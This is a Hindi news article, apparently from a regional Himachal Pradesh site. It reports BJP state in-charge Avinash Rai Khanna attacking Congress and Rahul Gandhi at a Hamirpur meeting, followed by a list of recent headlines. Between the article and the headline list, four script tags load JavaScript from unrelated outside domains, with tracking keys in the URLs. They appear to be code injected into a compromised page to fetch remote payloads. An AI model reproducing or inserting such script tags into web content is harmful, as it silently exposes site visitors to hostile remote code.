BJP प्रदेश प्रभारी खन्ना ने कांग्रेस को लगाई फटकार, कहा- मुद्दाविहीन, नेता विहीन पार्टी है कांग्रेस

<p>हमीरपुर जिला के समीरपुर में नवनियुक्त भाजपा प्रदेश प्रभारी अविनाश राय खन्ना ने बैठक की अध्यक्षता की। इस अवसर पर पूर्व मख्यमंत्री प्रो प्रेम कुमार धूमल, केन्द्रीय वित राज्य मंत्री अनुराग ठाकुर, जिला अध्यक्ष बलदेव शर्मा के अलावा पार्टी के मंडलाध्यक्ष, मोर्चा प्रभारी और चुने हुए बीडीसी और जिला परिसद के पदाधिकारी मौजूद रहें। अविनाश राय खन्ना ने कहा कि प्रदेश प्रभारी बनने के बाद जिला के प्रवास पर पहुंचे है और सारे प्रदेश को समझने और देखने के लिए काम किया&nbsp; जाएगा। बूथ तक जाकर सभी कार्यकर्ताओं से मिलकर पार्टी की नीतियों को जन-जन तक पहुंचना है। उन्होंने कहा कि भाजपा सरकार की तीन साल की उपलब्धियों को लोगों तक पहुंचाने के लिए कार्यकर्ता किस तरह से काम करें इस पर काम किया जाएगा।</p>

<p>खन्ना ने कहा कि भाजपा के लिए पूर्व सीएम धूमल मोस्ट रेस्पेक्टेड लीडर हैं और इनकी हाजरी हर जगह बहुत जरूरी है। उन्होंने कहा कि पार्टी को धूमल का मार्गदर्शन हर समय बहुत जरूरी है। नेता का चुनाव , चुनावों के बाद होता है। उन्होंने कहा कि हर चीज समय आने पर तय होती है और इसके लिए अभी बहुत समय है। उन्होंने कांग्रेस को फटकार लगाते हुए कहा कि कांग्रेस आज मुद्दाविहीन, नेता विहीन पार्टी है। आज हिमाचल विधानसभा में जो काम किया है उससे कांग्रेस को पूरे देश में इसका जबाव देना पडेगा। वहीं, कांग्रेस के इस तरह से काम से जनता ने भी दुख मनाया है क्योंकि राज्यपाल के साथ इस तरह का व्यवहार निदंनीय है।</p>

<p>भाजपा प्रदेश प्रभारी अविनाश राय खन्ना ने राहुल गांधी पर तंज कसते हुए कहा कि आज राहुल गांधी को कोई भी सीरियस नहीं लेता है और मीडिया भी न्यूज के लिए ही इस्तेमाल करते है। उन्होंने राहुल गांधी से पूछा कि वह&nbsp; बताएं कि आज तक देश के हित के लिए क्या बयान दिया है। पंजाब में भाजपा को नगर निगम चुनावों में हार पर प्रदेश प्रभारी ने कहा कि पंजाब में कांग्रेस कब्जा करने की राजनीति कर रही है। उन्होंने कहा कि पंजाब में गुडागर्दी करके बूथों पर कब्जा किया है और भाजपा के उम्मीदवारों के साथ मारपीट करने के काम किए है जो कि लोकतंत्र के लिए सही नहीं है।</p>

<p><img src=”/media/gallery/images/image(2437).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1614487273041″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

15 mins ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

1 hour ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

2 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

2 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

3 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

3 hours ago